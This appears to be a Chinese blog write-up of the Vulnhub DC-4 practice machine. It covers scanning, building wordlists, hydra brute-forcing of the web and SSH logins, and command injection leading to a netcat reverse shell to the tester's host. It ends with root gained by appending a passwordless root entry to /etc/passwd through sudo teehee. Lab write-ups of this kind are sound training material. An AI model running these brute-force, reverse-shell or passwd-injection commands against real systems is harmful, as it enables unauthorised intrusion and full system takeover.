Vulnhub靶机 DC-4

信息收集

在这里插入图片描述
`arp-scan -l 扫描本地

nmap -sV 192.168.0.132 扫描靶机开放端口`

开放80端口,访问一下页面

在这里插入图片描述

是个登录页面,而且可以用爆破来登录,没有验证机制

在这里插入图片描述
安装pydictor,一个字典生成工具,用它生成一个用户名字典

 git clone --depth=1 --branch=master https://www.github.com/landgrey/pydictor.git
cd pydictor/
chmod +x pydictor.py
python pydictor.py
python pydictor.py --len 3 6 -base dLc -o /Desktop/usr.txt


再用crew生成一个密码字典

cewl 192.168.0.132 -w /Desktop/pw.txt

进行爆破

hydra -L user.txt -P pw.txt 192.168.0.132 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" -F

账号:admin
密码:happy

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述在这里插入图片描述在这里插入图片描述

用burpsuite抓一下包,发现可以用ls命令,查询了一下文件
既然能执行命令,那不如直接执行nc
连接成功
上python脚本

nc -e /bin/sh 192.168.248.130 4444
python -c 'import pty;pty.spawn("/bin/bash")'


刚才看见jim文件夹下,有个backups,里面有一个旧字典,扒下来,留着爆破ssh
在这里插入图片描述

成功获得jim的密码

hydra -L 【用户名字典】 -P 【密码字典】 192.168.0.132 ssh -t 20

在这里插入图片描述

ssh jim@192.168.0.132

刚才不是有个mbox,看看有什么

在这里插入图片描述在这里插入图片描述

得到了charles的密码,登录进去

在这里插入图片描述
在这里插入图片描述
teehee命令可以写入文件内容并不覆盖文件原有内容
写入root用户
查找flag
完成

echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值